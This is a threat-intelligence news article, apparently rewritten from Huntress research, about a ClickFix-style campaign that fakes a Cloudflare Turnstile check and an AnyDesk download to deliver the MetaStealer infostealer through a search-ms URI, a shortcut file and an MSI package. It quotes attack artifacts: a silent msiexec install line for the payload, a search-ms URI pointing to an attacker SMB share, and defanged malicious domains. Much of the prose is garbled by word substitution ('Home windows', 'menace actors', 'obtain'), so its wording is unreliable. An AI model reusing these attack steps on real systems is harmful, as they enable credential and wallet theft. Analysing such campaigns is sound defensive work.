A novel variant of the ClickFix assault has lately emerged, masquerading as a reputable AnyDesk installer to unfold the MetaStealer infostealer.
This marketing campaign exploits a pretend Cloudflare Turnstile verification web page to lure victims into executing a crafted Home windows protocol handler, finally delivering a malicious MSI package deal disguised as a PDF.
As organizations proceed to harden their defenses in opposition to conventional social-engineering methods, menace actors are evolving their playbooks, mixing acquainted lures with sudden system elements to bypass detection and steal delicate credentials.
In early August, customers looking for the AnyDesk distant entry instrument encountered a misleading touchdown web page at anydeesk[.]ink/obtain/anydesk.html.
The web page displayed what gave the impression to be a typical Cloudflare Turnstile immediate, full with a “confirm you might be human” button.
The preliminary hyperlink that redirects customers to a pretend Cloudflare Turnstile (Supply – Huntress)
Upon clicking, victims weren’t guided to stick a command into the Run dialog field as in basic ClickFix assaults however as a substitute redirected into Home windows File Explorer by way of the search-ms URI handler.
Huntress researchers famous that this refined shift in redirection mechanism capitalized on the lesser-monitored Home windows Search protocol, catching safety groups off-guard.
Home windows File Explorer Redirection by way of search-ms (Supply – Huntress)
The an infection chain unfolds when the search-ms URI invokes a distant SMB share, delivering a Home windows shortcut file named “Readme Anydesk.pdf.lnk” to the sufferer’s system.
In contrast to FileFix variants that depend on clipboard-pasted PowerShell instructions, this assault robotically launches the LNK payload, which in flip executes a script to obtain and set up two elements: the real AnyDesk installer hosted on Microsoft Edge for plausibility, and a decoy PDF served from chat1[.]retailer.
The decoy file is in truth an MSI package deal that dynamically incorporates the sufferer’s hostname into its obtain URL by leveraging the %COMPUTERNAME% surroundings variable. As soon as downloaded, the MSI is put in by way of:-
msiexec /i “%TEMP%%%COMPUTERNAME%%.msi” /quiet
After this command completes, metadata reveals two major artifacts: a CustomActionDLL answerable for orchestrating the setup and a CAB archive containing ls26.exe, the MetaStealer dropper, and cleanup scripts.
Displayname Parameter Revealing SMB Share (Supply – Huntress)
Huntress analysts recognized that ls26.exe is protected with Non-public EXE Protector and displays attribute behaviors of MetaStealer, together with credential harvesting from browsers and crypto-wallet theft.
An infection Mechanism
On the coronary heart of this marketing campaign lies the ingenious use of Home windows Search. By invoking the search-ms URI protocol, attackers bypass the Run dialog restrictions in hardened environments and introduce payloads immediately by way of File Explorer.
The next URI snippet illustrates the redirection:-
search-ms:displayname=AnyDeskpercent20Securepercent20Access;crumb=location:attacker-smbshare
As soon as the person confirms the File Explorer immediate, the LNK file silently executes the obtain routines. The MSI’s CustomActionDLL then triggers the retrieval of Binary.bz.WrappedSetupProgram, which unpacks ls26.exe and 1.js.
The JavaScript file ensures the removing of middleman recordsdata, whereas ls26.exe initiates the info exfiltration part.
By abusing reputable Home windows protocols and file dealing with, this assault evades sandbox detection and safety alerts till the ultimate payload unleashes its malicious logic.
This rising tactic underscores the significance of monitoring unconventional extensions of trusted system options.
Defenders ought to contemplate implementing strict protocol handler insurance policies, SMB auditing, and contextual evaluation of MSI installations to detect and disrupt these subtle social-engineering campaigns.
Increase your SOC and assist your workforce defend your corporation with free top-notch menace intelligence: Request TI Lookup Premium Trial.
